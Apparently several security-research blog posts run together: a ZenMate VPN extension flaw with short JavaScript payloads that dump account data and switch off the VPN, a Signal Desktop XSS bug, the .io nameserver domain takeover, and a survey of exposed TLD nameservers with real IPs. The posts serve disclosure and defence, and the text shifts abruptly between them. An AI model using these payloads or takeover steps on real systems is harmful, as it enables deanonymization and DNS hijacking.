Summary

ZenMate, a VPN provider with over 43 million users, offers multiple browser extensions to use their VPN with. As of the time of this writing the browser extensions have a combined total of ~3.5 million users. The ZenMate VPN clients for both Chrome & Firefox trust the (previously) expired domain name zenmate.li which can make privileged API calls to the browser extension via message passing. I saw that this domain name was unregistered and bought it to both prove the issue and mitigate the vulnerability (since nobody else can buy it now that I own it). By hosting scripts on this domain it is possible to make use of the privileged APIs exposed via the page_api.js Content Script. After reaching out to the vendor they pushed out a fix very quickly and it is available in the latest version of the extension.

Impact

The impact of this exploit is the following, all of it can be done without any user interaction (other then that they must visit a webpage):

  • Dump all of the account information of the victim. The following is a list of some of the interesting bits:
  • Authentication UUID and secret token which can be used to login to the victim’s account.
  • Account ID
  • Email Address
  • Email Confirmation status
  • A list of all past email addresses used with the service, as well as when each change occured.
  • Account Type, and Subscription Information
  • Victim’s country
  • Device information along with detailed platform information, last sign-in time, usage stats such as ads/malware blocked, the device token, and more.
  • Whether or not the victim is connected to the VPN service.

  • Toggle off their VPN connection, allowing the attacker to reveal the victim’s true IP address and deanonymize them.
  • Update the credentials which the extension is using (e.g. log the victim’s extension into another account).
  • Inject rules into the extension which will force the extension not to proxy when visiting specifically declared sites. This allows an attacker to inject rules for domains they own in order to persist the deanonymization.

Vulnerability Details

The following is an excerpt from the Chrome extension’s manifest.json:

...trimmed for brevity…
{
  "js": [
    "scripts/page_api.js"
  ],
  "matches": [
    "*://*.zenmate.com/*",
    "*://*.zenmate.ae/*",
    "*://*.zenmate.ma/*",
    "*://*.zenmate.dk/*",
    "*://*.zenmate.at/*",
    "*://*.zenmate.ch/*",
    "*://*.zenmate.de/*",
    "*://*.zenmate.li/*",
    "*://*.zenmate.ca/*",
    "*://*.zenmate.co.uk/*",
    "*://*.zenmate.ie/*",
    "*://*.zenmate.co.nz/*",
    "*://*.zenmate.com.ar/*",
    "*://*.zenmate.cl/*",
    "*://*.zenmate.co/*",
    "*://*.zenmate.es/*",
    "*://*.zenmate.mx/*",
    "*://*.zenmate.com.pa/*",
    "*://*.zenmate.com.pe/*",
    "*://*.zenmate.com.ve/*",
    "*://*.zenmate.fi/*",
    "*://*.zenmate.fr/*",
    "*://*.zenmate.co.il/*",
    "*://*.zenmate.in/*",
    "*://*.zenmate.hu/*",
    "*://*.zenmate.co.id/*",
    "*://*.zenmate.is/*",
    "*://*.zenmate.it/*",
    "*://*.zenmate.jp/*",
    "*://*.zenmate.kr/*",
    "*://*.zenmate.lu/*",
    "*://*.zenmate.lt/*",
    "*://*.zenmate.lv/*",
    "*://*.zenmate.my/*",
    "*://*.zenmate.be/*",
    "*://*.zenmate.nl/*",
    "*://*.zenmate.pl/*",
    "*://*.zenmate.com.br/*",
    "*://*.zenmate.pt/*",
    "*://*.zenmate.ro/*",
    "*://*.zenmate.com.ru/*",
    "*://*.zenmate.se/*",
    "*://*.zenmate.sg/*",
    "*://*.zenmate.com.ph/*",
    "*://*.zenmate.com.tr/*",
    "*://*.zenmate.pk/*",
    "*://*.zenmate.vn/*",
    "*://*.zenmate.hk/*"
  ],
  "run_at": "document_start"
}
...trimmed for brevity...

The above shows that the Content Script scripts/page_api.js is run on all pages matching the patterns listed above. One of these is the *://*.zenmate.li/* pattern, which was the expired domain name that I bought.

The page_api.js Content Script does two things:

Injects a

Sets up listeners for the following custom events:

  • toggle
  • setPageExcludes
  • updateZM
  • removeCredentials
  • updateWithCredentials
  • request:getData

Due to the extension’s trust of the zenmate.li domain (and any of its subdomains), we can make use of these privileged calls to do nefarious actions. For example, we can pull all of the user’s account information by making the request:getData call. The following is an example payload which does this:

// Make call to Content Script to get all user data
__zm.getData(function(results) {
    console.log(
        results
    );
});

Upon an arbitrary user with the ZenMate VPN extension installed visiting the zenmate.li page with this payload hosted on it, we can extract all of the sensitive user information for the victim. The following is an example of the data you can steal (I used a temporary account I created for this demo):

{
  "user": {
    "id": 43643953,
    "email": "[email protected]",
    "unconfirmed_email": null,
    "flags": {},
    "premium_expires_at": "2018-06-04 01:33:22 UTC",
    "partner_id": null,
    "idhash": "c86d4aac37946935a5e13c543326e5477fe9b43a0a2b2307db5977797d48d5c1",
    "marketable": true,
    "mkt_opt_in": "out",
    "opt": "out",
    "banned": false,
    "discount_code": "7JGA-QLKU-J930-EVAH",
    "confirmation_sent_at": "2018-05-28 05:57:04 UTC",
    "has_recurring_subscription": false,
    "is_intermediate_premium": true,
    "paid_premium_expires_at": null,
    "created_at": "2018-05-28 00:48:25 UTC",
    "account_type": "PREMIUM",
    "server_time": "2018-05-28 05:58:16 UTC",
    "actual_country": "US",
    "subscription_country": "US",
    "country_code": "US",
    "locale": "US",
    "connected_country": "",
    "connected": false,
    "current_ip": "172.68.140.235",
    "anon": false,
    "is_premium": true,
    "is_verified": true,
    "is_b2b": false,
    "is_btr": true,
    "active_product": "premium",
    "service_status": "trial",
    "is_tenant": false,
    "is_anonymous": false,
    "bus_id": null,
    "has_opted_in": false,
    "reminder_emails": true,
    "active_order_id": 9532193,
    "recurrence_count": 0,
    "affiliate_id": null,
    "subscription": {
      "purchased_at": "2018-05-28 01:33:22 UTC",
      "expires_at": "2018-06-04 01:33:22 UTC",
      "sku": "7_day",
      "title": "Premium trial",
      "description": "7 days free Premium"
    },
    "email_history": [
      {
        "changed_from": "[email protected]",
        "changed_to": "[email protected]",
        "created_at": "2018-05-28T07:57:14.657+02:00"
      }
    ]
  },
  "device": {
    "created_at": "2018-05-28 04:11:41 UTC",
    "current_sign_in_at": "2018-05-28 05:58:16 UTC",
    "features": [
      {
        "id": "ADBLOCK",
        "enabled": true,
        "available": true,
        "description": "Enable ad blocking"
      },
      {
        "id": "MALWAREBLOCK",
        "enabled": true,
        "available": true,
        "description": "Enable blocking of harmful sites"
      }
    ],
    "id": 59551317,
    "install_id": "ee983860-753a-14f6-31c0-208bff9e9bf5",
    "last_sign_in_at": "2018-05-28 04:11:45 UTC",
    "platform": {
      "id": "72338bed-f4ec-483c-b6f6-2771c38e92a9",
      "platform_name": "Chrome",
      "platform_vendor": "Google",
      "icon": "chrome",
      "environment": "browser_extension"
    },
    "platform_version": [],
    "registered_for_push_notifications": false,
    "stats": {
      "ads_blocked": 0,
      "bad_sites_blocked": 0,
      "gzip_compression_ration": 0,
      "webp_compression_ratio": 0,
      "compresssion_ratio": 0
    },
    "token": "e09a9bdbcf8c6fda2c11c60eb761a943d4ab448c3dbf0579938780f18ce35f16",
    "updated_at": "2018-05-28 05:58:16 UTC",
    "uuid": "d8fa9eed-47c8-4566-9e57-a812495d3b4c"
  },
  "version": "6.2.3"
}

Deanonymizing a user is similar and can be done with a payload like the following:

// Turn off VPN
__zm.toggle(false);

The following proof-of-concept page to demonstrate this issue. Upon visiting it with the (previously vulnerable) ZenMate VPN extension installed, your VPN will be toggled off and your account information will be dumped and your real IP will be revealed:

https://zenmate.li/poc.html</code>

Thoughts on Root Cause & Remediation

This vulnerability exhibits a fairly common coding pattern in Chrome extensions where privileged API calls are declared inside of the extension and are then delegated via Content Scripts to regular web domains owned by the author for calling. This coding pattern is generally problematic because Chrome extensions enforce things like minimum Content Security Policies (CSP) and have external navigation and embedding blocking enabled by default. When you build a bridge outside of the secured Chrome extension environment and then greatly increase the attack surface via over-scoping you’re setting yourself up for failure. With the Content Script policy previously in place, all that is required for an attacker to make privileged extension API call is an XSS (or domain/sub-domain takeover) in any sub-domain of any of the dozens of domains listed. The patch applied by the vendor for both the Chrome and Firefox extension was to remove all domains except for *://*.zenmate.com/*. While this is still a fairly wide scope, it is at least preferable to the original policy. However, all that it would take to exploit this vulnerability again would be an XSS in any sub-domain of zenmate.com (or the base domain).

Exploit Video

Disclosure Timeline

  • May 28, 2:15am – Disclosed issue via security contact email address.
  • May 28, 2:38am – Confirmed by vendor.
  • May 28, 9:00pm – Patch issued for Chrome and Firefox extensions.

Remediation TL;DR

If you’re a concerned Signal user please update to the latest version of Signal Desktop (fixed in version v1.11.0) which addresses all of these issues. Note that the mobile apps for Signal were not affected by this issue.

Background Information

If you’re an avid follower of all that is security-Twitter, then you’ve probably heard about the impressive finding of Remote Code Execution (RCE) via HTML markup injection in Signal Desktop by Iván Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and Juliano Rizzo (@julianor):

Shortly after seeing this Tweet I wanted to validate if this finding was indeed real so I played around with my own copy of Signal Desktop to see if I could reproduce these results. I previously worked with @LittleJoeTables and @infosec_au on research investigating exploitation of web-on-desktop type apps and so I was fairly certain I knew what I was looking at. I began playing around with the Signal Desktop app trying to get arbitrary HTML markup to be evaluated but it didn’t appear to be straightforward. After trying a few different fields (name, plain message, etc) I eventually found that if you created a message with HTML markup (say, <h1>Test</h1>), and you then did a Quoted Reply message to that message, the original markup would be evaluated as HTML! I then posted on Twitter than I was able to reproduce the problem:

“Wait a Minute…”

However, something was not quite right. I later applied the Signal update and yet I was still able to exploit my issue so I thought there was something wrong with my install. I uninstalled Signal Desktop and didn’t think much of it until I later read the writeup done by the security researchers. Upon reading the writeup I realized the researchers were just sending vanilla Signal messages which were being interpreted as HTML, and not the Quoted Replies that I had been using. I messaged @HacKanCuBa on Twitter to discuss this oddity, and he tried my method on his copy of Signal Desktop to find…the exploit still worked! As it turns out both were separate very similar vulnerabilities resulting in the same impact. Who could have guessed that?

After this realization we quickly notified Signal of the issue. They had a patch out in hours which was very impressive and they even added in some extra mitigations to prevent the problem from occurring again.

Vulnerability Root Cause

For the full writeup on the original vulnerability, see this article. Here we’ll dive into the root cause of my particular variant (CVE-2018-11101) and show how Signal fixed it.

The core of the vulnerability was in the use of React’s dangerouslySetInnerHTML in order to render the contents of a Quoted Reply message. The relevant code can be found in Quote.tsx and is the following:

  public renderText() {
    const { i18n, text, attachments } = this.props;

    if (text) {
      return (
        <div className="text" dangerouslySetInnerHTML=\{\{ __html: text \}\} />
      );
    }
...trimmed for brevity...

To quote the React documentation itself:

_dangerouslySetInnerHTML is React’s replacement for using innerHTML in the browser DOM. In general, setting HTML from code is risky because it’s easy to inadvertently expose your users to a cross-site scripting (XSS) attack. So, you can set HTML directly from React, but you have to type out dangerouslySetInnerHTML and pass an object with a _html key, to remind yourself that it’s dangerous.</a>

Much like innerHTML, use of dangerouslySetInnerHTML is, well, dangerous and can cause lead to XSS like what occurred in the Signal Desktop app. This allowed for the quoted reply text to be evaluated as HTML and served for the base of this exploit.

Signal fixed this by removing the usage of dangerouslySetInnerHTML, along with further tightening the app’s CSP.

All said and done this vulnerability was present in the Signal Desktop app for about three weeks total before being patched (starting in 1.8.0).

Going Forward

Thanks to some help from my friends @aegarbutt and @LittleJoeTables we were able to compile a list of strategic defense-in-depth recommendations for Signal Desktop which we’ve sent to the Signal security team per their request. At the end of the day there will always be new “hot” vulnerabilities, but the “vendor” response is generally what separates the wheat from the chaff. The Signal team’s quick patch time along with a strong interest in mitigating vulnerabilities of this type in the future was encouraging to see. I’ll remain a Signal user for the foreseeable future :)

Exploit Video

Timeline

  • 4:31 PM – May 11, 2018 PST – Discovery of exploit, although originally mistaken by me for a duplicate.
  • ~3:30 PM – May 14, 2018 PST – Revelation that exploit works against latest version of Signal
  • 3:57 PM – May 14, 2018 PST – Vulnerability disclosed to Signal Security
  • 4:21 PM – May 14 2018 PST – Signal requests 24 hours before disclosure to ensure users patch. States a patch will be out in 2-3 hours.
  • ~5:47 PM – May 14 2018 PST – Patch pushed to all Signal Desktop users

Credits

Special thanks to the following folks:

_

In a previous post we talked about taking over the .na, .co.ao, and .it.ao domain extensions with varying levels of DNS trickery. In that writeup we examined the threat model of compromising a top level domain (TLD) and what some avenues would look like for an attacker to accomplish this goal. One of the fairly simple methods that was brought up was to register a domain name of one of the TLD’s authoritative nameservers. Since a TLD can have authoritative nameservers at arbitrary domain names it’s possible that through a misconfiguration, expiration, or some other issue that someone would be able to register a nameserver domain name and use it to serve new DNS records for the entire TLD zone. The relevant quote from the previous post I’ll include here:

This avenue was something I was fairly sure was going to be the route to victory so I spent quite a lot of time building out tooling to check for vulnerabilities of this type. The process for this is essentially to enumerate all nameserver hostnames for a given extension and then checking to see if any of the base-domains were expired and available for registration. The main issue I ran into is many registries will tell you that a domain is totally available until you actually attempt to purchase it. Additionally there were a few instances where a nameserver domain was expired but for some reason the domain was still unavailable for registration despite not being marked as reserved. This scanning lead to the enumeration of many domain takeovers under restricted TLD/domain extension space (.gov, .edu, .int, etc) but none in the actual TLD/domain extensions themselves.

As it turns out, this method was not only a plausible way to attack a TLD, it actually led to the compromise of the biggest TLD yet.

The .io Anomaly

While graphing out the DNS delegation paths of various TLDs late on a Friday night I noticed a script I had written was giving me some unexpected results for the .io TLD:

io._trust_tree_graphOne of the features of this script (called TrustTrees) is that you can pass it a Gandi API key and it will check to see if any of the nameservers in the delegation chain have a domain name that’s available for registration. It appeared that Gandi’s API was returning that multiple .io nameserver domains were available for purchase! This does not necessarily mean you can actually register these domain names however, since in the past I had seen multiple incidents where registries would state a domain name was available but wouldn’t allow the actual registration to go through due to the domain name being “reserved”. I decided to go straight to the source and check the registry’s website at NIC.IO to see if this was true. After a quick search for the nameserver domain of ns-a1.io I was surprised to find that the registry’s website confirmed that this domain was available for the registration price of 90.00 USD. Given that this was around midnight I decided to go ahead and attempt to purchase the domain to see if it would actually go through. Shortly afterwards I received an email confirming that my domain name registration was “being processed”:

ns-a1.io_domain_purchase_confirmation_receiptIt’s not clear why I received a confirmation from 101Domain but apparently .io’s registrations (and possibly their entire registry?) is managed via this company. Since it was well past midnight at this point I shrugged it off and eventually forgot about the registration until the following Wednesday morning when I got the following notification as I was walking out the door to go to work:

ns-a1.io_domain_activated_emailAt this point I instantly was reminded of the details of that registration and I turned around to check if I had actually just gained control over one of .io’s nameservers. I dig a quick dig command for the domain and sure enough my test DNS nameservers (ns1/ns2.networkobservatory.com) were listed for ns-a1.io:

bash-3.2$ dig NS ns-a1.io

; <<>> DiG 9.8.3-P1 <<>> NS ns-a1.io
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8052
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;ns-a1.io.          IN  NS

;; ANSWER SECTION:
ns-a1.io.       86399   IN  NS  ns2.networkobservatory.com.
ns-a1.io.       86399   IN  NS  ns1.networkobservatory.com.

;; Query time: 4 msec
;; SERVER: 2604:5500:16:32f9:6238:e0ff:feb2:e7f8#53(2604:5500:16:32f9:6238:e0ff:feb2:e7f8)
;; WHEN: Wed Jul  5 08:46:44 2017
;; MSG SIZE  rcvd: 84

bash-3.2$

I queried one of the root DNS servers to again confirm that this domain was listed as one of the authoritative nameservers for the .io TLD and sure enough, it definitely was:

bash-3.2$ dig NS io. @k.root-servers.net.

; <<>> DiG 9.8.3-P1 <<>> NS io. @k.root-servers.net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19611
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 7, ADDITIONAL: 12
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;io.                IN  NS

;; AUTHORITY SECTION:
io.         172800  IN  NS  ns-a1.io.
io.         172800  IN  NS  ns-a2.io.
io.         172800  IN  NS  ns-a3.io.
io.         172800  IN  NS  ns-a4.io.
io.         172800  IN  NS  a0.nic.io.
io.         172800  IN  NS  b0.nic.io.
io.         172800  IN  NS  c0.nic.io.

;; ADDITIONAL SECTION:
ns-a1.io.       172800  IN  AAAA    2001:678:4::1
ns-a2.io.       172800  IN  AAAA    2001:678:5::1
a0.nic.io.      172800  IN  AAAA    2a01:8840:9e::17
b0.nic.io.      172800  IN  AAAA    2a01:8840:9f::17
c0.nic.io.      172800  IN  AAAA    2a01:8840:a0::17
ns-a1.io.       172800  IN  A   194.0.1.1
ns-a2.io.       172800  IN  A   194.0.2.1
ns-a3.io.       172800  IN  A   74.116.178.1
ns-a4.io.       172800  IN  A   74.116.179.1
a0.nic.io.      172800  IN  A   65.22.160.17
b0.nic.io.      172800  IN  A   65.22.161.17
c0.nic.io.      172800  IN  A   65.22.162.17

;; Query time: 70 msec
;; SERVER: 2001:7fd::1#53(2001:7fd::1)
;; WHEN: Wed Jul  5 08:46:14 2017
;; MSG SIZE  rcvd: 407

Yikes! I quickly SSHed into my DNS testing server that was now hosting this domain and quickly killed the BIND server that was running. If I was starting to receive DNS traffic I certainly didn’t want to serve up bad responses for people trying to legitimately access their .io domain names. With the BIND server no longer responding to queries on port 53 all DNS queries would automatically fail over to the other nameservers for the TLD and it wouldn’t greatly affect the traffic (other than a slight delay in resolution time while DNS clients failed over to working nameservers). In order to see if I was actually receiving traffic I did a quick tcpdump of all DNS traffic to a file to see just how many queries I was currently getting. I immediately saw hundreds of queries verbosely being printed to my terminal from random IP addresses across the Internet. It looks like I was definitely serving up traffic for the entire .io TLD, and worse yet this was likely only the beginning since many DNS clients likely were still operating on cached DNS records which would clear shortly.

Reporting a Security Issue in a TLD

With my server no longer responding to any DNS queries my mind was then set on getting this fixed as quickly as possible. My main concern was that there were still multiple other nameserver domains which could still be registered and that could be done by anyone with the money and the knowledge to do so. I looked up the contacts for the .io TLD in IANA’s root database:

io_contact_info

I then wrote up a summary of the issue and emailed both contacts about the problem and conveyed the urgency of the fix. I stated my concern with the other TLD nameserver domains being available for registration and stated that if I didn’t receive a response within a few hours that I would go ahead and register those as well to protect the TLD. After sending the email I immediately received a bounce message indicating that the [email protected] was not an email address that existed at all:

email_bounceThis was not a strong vote of confidence that someone was going to see this notice. I decided to take action and just spend the money to buy the other nameserver domains to prevent anyone else from hijacking the TLD. Just like with the first domain I explicitly set my DNS server to not respond to inbound queries so that it wouldn’t interfere with regular .io traffic. Those domain orders were actually filled quite quickly:

securing_other_nameserversPhew. At the very least this could no longer be exploited by any random attacker and I was able to head to work with much less worry.

Later that day I called NIC.IO’s support phone number and requested the appropriate email to contact any security personnel/team that they had for the TLD. The agent assured me that [email protected] was the appropriate contact for this issue (which I double verified just to be sure). While it seemed unlikely to be the correct contact I forwarded the report to that email address as well hoping that at the very least it would be forwarded by the abuse department to the appropriate place. With little further leads on reaching an appropriate security contact I waited for a response.

“Oops” – Remediation via Revoked Domains

Around noon the following day I received a blast of notifications from 101Domains stating that my domain privacy was deactivated, my “support ticket” was answered, and all of my domains had been revoked by the registry:

101domain_email_blastLooks like, shockingly enough, the abuse@ alias was the correct email address for the issue. After logging into my 101Domain account I found the following message from the 101Domain legal department:

101domain_oops_deleted_io_nsAll said and done this was actually an excellent response time (though usually I just get a “fixed it” response via email instead of a Legal Department notice). After verifying that I was not able to re-register these domains it would appear that this had been completely remediated.

Impact

Given the fact that we were able to take over four of the seven authoritative nameservers for the .io TLD we would be able to poison/redirect the DNS for all .io domain names registered. Not only that, but since we have control over a majority of the nameservers it’s actually more likely that clients will randomly select our hijacked nameservers over any of the legitimate nameservers even before employing tricks like long TTL responses, etc to further tilt the odds in our favor. Even assuming an immediate response to a large scale redirection of all .io domain names it would be some time before the cached records would fall out of the world’s DNS resolvers.

One mitigating factor that should be mentioned is that the .io TLD has DNSSEC enabled. This means that if your resolver supports it you should be defended from an attacker sending bad/forged DNS data in the way mentioned above. That being said, as mentioned in a previous post DNSSEC support is pretty abysmal and I rarely encounter any support for it unless I specifically set a resolver up that supports it myself.

*As an unrelated aside, it’s important to remember to kill tcpdump after you’ve started it. Not doing that is a great way to obliterate your VPS disk space with DNS data, which was an unexpected additional impact of this :). Please note that any DNS data recorded for debugging purposes has now been purged for the privacy of the users of the .io TLD/its domains.

Mitigations and TLD Security

I’ve already written at some length about how some of these issues could be mitigated from a TLD perspective (see Conclusions & Final Thoughts of the post The Journey to Hijacking a Country’s TLD – The Hidden Risks of Domain Extensions for more info on this). In the future I hope to publish a more extensive guide on how TLDs and domain extension operators can better monitor and prevent issues like this from occurring.

Greetz

I promised a friend of mine that I would do a silly old-school hacker shout-out in my next blog post so I’m fulfilling this obligation here :)special thanks to the following folks for both moral and “immoral” support (as phrased by the one and only HackerBadger).

Greetz to [HackerBadger](https://twitter.com/aegarbutt), EngSec (y’all know who you are), and the creator of the marquee tag. [Hack the planet](https://www.youtube.com/watch?v=u3CKgkyc7Qo), [the gibson](https://www.youtube.com/watch?v=Bmz67ErIRa4), etc.

I will liken him to a wise man, who built his house on a rock. The rain came down, the floods came, and the winds blew, and beat on that house; and it didn’t fall, for it was founded on the rock. Everyone who hears these words of mine, and doesn’t do them will be like a foolish man, who built his house on the sand. The rain came down, the floods came, and the winds blew, and beat on that house; and it fell—and great was its fall.

The Parable of the Wise and Foolish Builders
{.passage-display}

Domain names are the foundation of the Internet that we all enjoy. However, despite the amount of people that use them very few understand how they work behind the scenes. Due to many layers of abstraction and various web services many people are able to own a domain and set up an entire website without knowing anything about DNS, registrars, or even WHOIS. While this abstraction has a lot of very positive benefits it also masks a lot of important information from the end customer. For example, many registrars are more than happy to advertise a .io domain name to you but how many .io owners actually know who owns and regulates .io domains? I don’t think it’s a large stretch to say that most domain owners know little to nothing about the entities behind their domain name. The question that is asked even less is “What is this domain extension’s track record for security?”.

A Quick Introduction to the DNS Structure

Feel free to skip this section if you already know how DNS works and is delegated.

So what are you buying when you purchase a domain name? At a core, you’re simply buying a few NS (nameserver) records which will be hosted on the extension’s nameservers (this of course excludes secondary services such as WHOIS, registry/registrar operational costs, and other fees which go to ICANN). To better understand extension’s place in the chain of DNS we’ll take a look at a graph of example.com‘s delegation chain. I’ve personally found that visualization is very beneficial when it comes to understanding how DNS operates so I’ve written a tool called TrustTrees which builds a graph of the delegation paths for a domain name:

example.com_trust_tree_graphThe above graph shows the delegation chain starting at the root level DNS server. For those unfamiliar with the DNS delegation process, it works via a continual chain of referrals until the target nameserver has been found. A client looking for the answer to a DNS query will start at the root level, querying one of the root nameservers for the answer to a given DNS query. The roots of course likely don’t know the answer and will delegate the query to a TLD, which will in turn delegate it to the appropriate nameservers and so on until an authoritative answer has been received confirming that the nameserver’s response is from the right place. The above graph shows all of the possible delegation paths which could take place (blue indicates an authoritative answer). There are many paths because DNS responses contain lists of answers in an intentionally random order (a technique known as Round Robin DNS) in order to provide load balancing for queries. Depending on the order of the results returned different nameservers may be queried for an answer and thus they may provide different results altogether. The graph shows all these permutations and shows the relationships between all of these nameservers.

So, as discussed above, if you bought example.com the .com registry would add a few NS records to its DNS zones which would delegate any DNS queries for example.com to the nameservers you provided. This delegation to your nameservers is what really gives you control over the domain name and the ability to make arbitrary sub-domains and DNS records for example.com. If the .com owning organization decided to remove the nameserver (NS) records delegating to your nameservers then nobody would ever reach your nameservers and thus example.com would cease to work at all.

Taking this up a step in the chain you can think of TLDs and domain extensions in much the same way as any other domain name. TLDs only exist and can operate because the root nameservers delegate queries for them to the TLD’s nameservers. If the root nameservers suddenly decided to remove the .com NS records from its zone database then all .com domain names would be in a world of trouble and would essentially cease to exist.

Just Like Domain Names, Domain Name Extensions Can Suffer From Nameserver Vulnerabilities

Now that we understand that TLDs and domain extensions have nameservers just like regular domain names, one question that comes up is “Does that mean that TLDs and domain extensions can suffer from DNS security issues like domain names do?“. The answer, of course, is yes. If you’ve seen some of the past posts in this blog you’ve seen that we’ve learned that we can hijack nameservers in a variety of ways. We’ve shown how an expired or typo-ed nameserver domain name can lead to hijacking and we’ve also seen how many hosted DNS providers allow for gaining control over a domain’s zone without any verification of ownership. Taking the lessons we’ve learned from these explorations we can apply the same knowledge to attempt a much more grandiose feat: taking over an entire domain extension.

The Mission to Take Over a Domain Extension – The Plan of Attack

Unlike a malicious actor I’m unwilling to take many of the actions which would likely allow you to quickly achieve the goal of hijacking a domain extension. Along the course of researching methods for attacking domain extensions I found that many extension/TLD nameservers and registries are in an abysmal state to begin with, so exploiting and gaining control over one is actually much easier than many would think. Despite me considering tactics like obtaining remote code execution on a registry/nameserver to be out of scope I will still mention them as a viable route to success, since real world actors will likely have little regard for ethics.

Generally speaking, the following are some ways that I came up with for compromising a TLD/domain extension:

  • Exploit a vulnerability in the DNS server which hosts a given domain extension or exploit any other services hosted on an extension’s nameservers. Attacking registries also falls into this same category as they have the ability to update these zones as part of normal operation.
  • Find and register an expired or typo-ed nameserver domain which is authoritative for a domain extension/TLD.
  • Hijacking the domain extension by recreating a DNS zone in a hosted provider which no longer has the zone for the extension hosted there.
  • Hijacking the email addresses associated with a TLD’s WHOIS contact information (as listed in the IANA root zone database).

We’ll go over each of these and talk about some of the results found while investigating these avenues as possible routes to our goal.

Vulnerable TLD & Domain Extension Nameservers Are Actually Quite Common

To begin researching the first method of attack, I decided to do a simple port scan of all of the TLD nameservers. In a perfect world what you would like to see is a list of servers listening on UDP/TCP port 53 with all other ports closed. Given the powerful position of these nameservers it is important to have as little surface area as possible. Any additional services exposed such as HTTP, SSH, or SMTP are all additional pathways for an attacker to exploit in order to compromise the given TLD/domain extension.

This section is a bit awkward because I want to outline how dire the situation is without encouraging any malicious activity. During the course of this investigation there were a few situations where simply browsing things like websites hosted on the TLD nameservers led to strong indicators of both exploitability and in some cases even previous compromise. I will be omitting these and focusing only on some key examples to demonstrate the point.

Finger

The finger protocol was written in 1971 by Les Earnest to allow users to check the status of a user on a remote computer. This is an incredibly old protocol which is no longer used on any modern systems. The idea of the protocol is essentially to answer the question of “Hey, is Dave at his machine right now? Is he busy?”. With finger you can check into the remote user’s login name, real name, terminal name, idle time, login time, office location and office phone number. As an example, we’ll finger one of the authoritative nameservers for the country of Bosnia and see what the root user is up to:

bash-3.2$ finger -l [email protected]
[202.29.151.3]
Login: root                       Name: Charlie Root
Directory: /root                        Shell: /bin/sh
Last login Sat Dec 14 16:41 2013 (ICT) on console
No Mail.
No Plan.

Looks like root has been away for a long time! Let’s take a look at one of the nameservers for Vietnam:

bash-3.2$ finger -l [email protected]
[203.119.60.105]
Login name: nobody                In real life: NFS Anonymous Access User
Directory: /                        
Never logged in.
No unread mail
No Plan.

Login name: noaccess              In real life: No Access User
Directory: /                        
Never logged in.
No unread mail
No Plan.

Login name: nobody4               In real life: SunOS 4.x NFS Anonymous Access User
Directory: /                        
Never logged in.
No unread mail
No Plan.

Login name: named                 In real life: User run named
Directory: /home/named                  Shell: /bin/false
Never logged in.
No unread mail
No Plan.
bash-3.2$ 
bash-3.2$ finger -l [email protected]
[203.119.60.105]
Login name: root                  In real life: Super-User
Directory: /                            Shell: /sbin/sh
Last login Tue Sep 30, 2014 on pts/1 from DNS-E
No unread mail
No Plan.

This one is more recent with a last login date for root of September 30, 2014. The fact that this protocol is installed on these nameservers likely indicates just how old these servers are.

**Dynamic Websites

**

Probably the most common open nameserver port next to 53 was port 80 (HTTP). Some of the most interesting results came from simply visiting these websites. For example, one nameserver simply redirected me to an ad network:

* Rebuilt URL to: http://93.190.140.242/
*   Trying 93.190.140.242...
* Connected to 93.190.140.242 (93.190.140.242) port 80 (#0)
> GET / HTTP/1.1
> Host: 93.190.140.242
> Accept: */*
> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
> 
< HTTP/1.1 302 Moved Temporarily
< Server: nginx/1.10.1
< Date: Sun, 04 Jun 2017 03:16:30 GMT
< Content-Type: text/html
< Transfer-Encoding: chunked
< Connection: close
< X-Powered-By: PHP/5.3.3
< Location: http://n158adserv.com/ads?key=6c6004f94a84a1d702c2b8dc16052e50&ch=140.242
< 
* Closing connection 0

I’m still unsure if this was a compromised nameserver or if the owner was just trying to make some extra money off of sketchy ads.

Other nameservers (such as one of the Albania nameservers for .com.al, .edu.al, .mil.al, .net.al, and .nic.al) returned various configuration pages which print verbose information about the machine they run on:

phpinfo_al.com_al.govThe party wouldn’t be complete without the ability to run command-line utilities on the remote server (nameserver for .ke, .ba, and a handful of other extensions):

run_those_commands_bro**And much much more…

**

Additionally there are many other fun services which I won’t go too into much detail for brevity. Things like SMTP, IMAP, MySQL, SNMP, RDP are all not at all uncommon ports to be open on various domain extension nameservers. Given the large attack surface of these services I would rate the chances of this route succeeding very highly, however we won’t engage in any further testing given that we don’t want to act maliciously. Sadly due to the sheer number of nameservers running outdated and insecure software responsible disclosure to all owners would likely be an endless endeavor.

Checking for Expired TLD & Extension Nameserver Domain Names

This avenue was something I was fairly sure was going to be the route to victory so I spent quite a lot of time building out tooling to check for vulnerabilities of this type. The process for this is essentially to enumerate all nameserver hostnames for a given extension and then checking to see if any of the base-domains were expired and available for registration. The main issue I ran into is many registries will tell you that a domain is totally available until you actually attempt to purchase it. Additionally there were a few instances where a nameserver domain was expired but for some reason the domain was still unavailable for registration despite not being marked as reserved. This scanning lead to the enumeration of many domain takeovers under restricted TLD/domain extension space (.gov, .edu, .int, etc) but none in the actual TLD/domain extensions themselves.

Examining Hosted TLD & Extension Nameserver for DNS Errors

One useful tool for finding vulnerabilities (even ones you didn’t even know existed) is to scan for general DNS errors and misconfigurations and investigate the anomalies you find. One useful tool for this is ZoneMaster which is a general DNS configuration scanning tool which has tons and tons of tests for misconfigurations of nameservers/DNS. I tackled this approach by simply scripting up ZoneMaster scans for all of the domain extensions listed in the public suffix list. Pouring over and grepping through the results led to some pretty interesting findings. One finding is listed in a previous blog post (in the country of Guatemala’s TLD .gt) and another is shown below.

Striking Paydirt – Finding Vulnerabilities Amongst the Errors

After scripting the ZoneMaster tool to automate scanning all of the TLD/domain extensions in the public suffix list I found one particularly interesting result. When scanning over the results I found that one of the nameservers for the .co.ao extension was serving a DNS REFUSED error code when requesting the nameservers for the .co.ao zone:

dns_refused_co_aoA quick verification with dig confirmed that this was indeed the case:

$ dig NS co.ao @ns01.backupdns.com.

; <<>> DiG 9.8.3-P1 <<>> NS co.ao @ns01.backupdns.com.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 21693
